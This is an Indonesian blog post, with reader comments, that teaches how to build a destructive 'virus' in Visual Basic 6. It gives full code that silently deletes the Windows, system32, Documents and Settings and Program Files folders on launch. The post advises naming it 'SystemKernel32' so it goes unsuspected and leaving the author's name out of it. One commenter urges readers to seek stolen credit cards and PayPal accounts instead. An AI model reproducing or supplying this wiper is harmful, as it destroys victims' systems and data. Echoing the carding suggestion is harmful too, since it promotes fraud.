Kamis, 15 Juli 2010

Cara membuat Virus Kejam Tanpa Terdeteksi AntiVirus

nahkarena teman-teman saya banyak yang minta tutorial untuk membuat virus,in saya kasih tutorial membuat virus, setelah sebelumnyasaya buat tutorial cara membuat virus yang kerjanya itu merestartkomputer,nah sekarang tutorial buat bikin virus yg rada mematikan,tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnyacara kerjanya simple gtYg diperluin:
1. VB/Visual Basic(optimal : 6.0)
2. Ngerti tombol2nya VB



—- more —-
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu gasengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kaloada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu editkoq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain
5. Jangan pernah naroh nama lu di nih virus… k?
6. compile deh… slese!

6 komentar:

Asrizal Wahdan Wilsa mengatakan...

wah share virus ne sob??boleh neyh...buat uji antivirus

Anonim mengatakan...

bikin fromnya gmn??

Anonim mengatakan...

yng biru sm merah yg mmn kli

Aris mengatakan...

kwkwkwkwkwk
ni bukan virus bro
jelas aja gak kedetek ma av
ni cuma single program, nyebar nya pake manual atau copas
belum lengkap ni program, belum bisa menggandakan diri

dari pada buat virus mending buat yg lain aja deh yg lebih berguna

peace & love forever
vbswg fans old time

Anonim mengatakan...

MENDING LU CARI CC PAYPAL ATAU WU..NI GK ADA GUNA NYA.GK NGASILI UANG GENG

Mziyadr Gt mengatakan...

ini virus penghapus data njir

Posting Komentar

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Macys Printable Coupons